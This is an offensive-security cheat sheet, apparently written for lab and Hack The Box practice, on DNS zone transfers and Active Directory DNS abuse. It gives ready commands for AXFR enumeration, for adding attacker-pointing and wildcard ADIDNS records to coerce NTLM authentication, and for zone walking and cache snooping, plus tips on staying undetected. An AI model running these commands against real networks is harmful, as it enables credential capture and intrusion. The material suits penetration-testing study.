Back to All Modules

DNS Zone Transfers & ADIDNS Exploitation

#Overview

DNS zone transfers replicate DNS records between servers. If misconfigured, they expose all internal hostnames, subdomains, and network topology. ADIDNS (Active Directory Integrated DNS) can be exploited to add records for NTLM coercion attacks.

#Prerequisites

  • DNS server that allows zone transfers (AXFR)
  • Network access to DNS port 53
  • For ADIDNS: domain user credentials with DNS write permissions

#Detection & Enumeration

# Attempt DNS zone transfer (AXFR)
dig axfr domain.local @10.10.10.10
dig axfr domain.local @ns1.domain.local

# Using host command
host -t axfr domain.local 10.10.10.10

# Using dnsrecon
dnsrecon -d domain.local -t axfr -n 10.10.10.10

# Using nmap
nmap --script dns-zone-transfer -p 53 10.10.10.10

# Using fierce
fierce --domain domain.local --dns-servers 10.10.10.10
BASH

#Exploitation / Execution

#ADIDNS Exploitation with Impacket

# Add a DNS record in ADIDNS (for NTLM coercion)
python3 dnstool.py -u 'DOMAIN\user' -p 'password' -r 'attacker.domain.local' -d 10.10.14.5 --action add dc.domain.local

# Add wildcard record (resolves ALL queries to attacker IP)
python3 dnstool.py -u 'DOMAIN\user' -p 'password' -r '*' -d 10.10.14.5 --action add dc.domain.local

# Remove a DNS record (cleanup)
python3 dnstool.py -u 'DOMAIN\user' -p 'password' -r 'attacker.domain.local' --action remove dc.domain.local
BASH

#Wildcard Detection Methodology

# Test for wildcard DNS (important before subdomain brute-forcing)
dig random12345.domain.local A +short
dig thisdoesnotexist99.domain.local A +short
# If both resolve to the same IP → wildcard is active
# Filter wildcard IPs from brute-force results to avoid false positives
BASH

#NSEC/NSEC3 Zone Walking

# NSEC walking — enumerate all records via DNSSEC
dig @ns1.domain.local domain.local NSEC
dnsrecon -d domain.local -t zonewalk

# NSEC3 walking (hashed names, harder to walk)
# Use nsec3walker or similar tools
# nsec3walker domain.local
BASH

#DNS Cache Snooping

# Check if a domain is cached (recently queried by target)
dig @10.10.10.10 www.example.com A +dnssec +additional
# Non-recursive query to check cache without generating new queries
dig @10.10.10.10 www.example.com A +noedns +norecurse
BASH

#Common Pitfalls

  • Zone transfers are blocked by default on modern DNS servers — always try but expect failure
  • ADIDNS record additions require DNS write permissions — standard users may not have this
  • Wildcard DNS creates false positives in subdomain brute-forcing — always test for wildcards first
  • DNS cache snooping may not work if the server doesn't support non-recursive queries
  • NSEC3 is harder to walk than NSEC — hashes must be cracked or brute-forced

#OPSEC Considerations

  • DNS brute-force generates thousands of queries to authoritative name servers — easily detected
  • Using public resolvers (8.8.8.8, 1.1.1.1) for initial queries is stealthier than querying target name servers directly
  • DNS zone transfer attempts are logged by most modern DNS servers
  • ADIDNS modifications are logged in the Directory Service event log (Event ID 5136)

#Post-Exploitation Value

DNS zone transfers reveal internal hostnames and network topology. ADIDNS exploitation enables NTLM coercion attacks by directing authentication to attacker-controlled hosts. Combined with Responder or ntlmrelayx, this creates credential capture and relay opportunities.

#Tool References

ToolLink
digBuilt-in (bind-utils/dnsutils)
dnsreconhttps://github.com/darkoperator/dnsrecon
dnstool.pyhttps://github.com/fortra/impacket
fiercehttps://github.com/mschwager/fierce
nsec3walkerhttps://github.com/anonion0/nsec3walker

#Source Machines

  • Common in HTB machines with DNS services
  • Frequently paired with NTLM relay attacks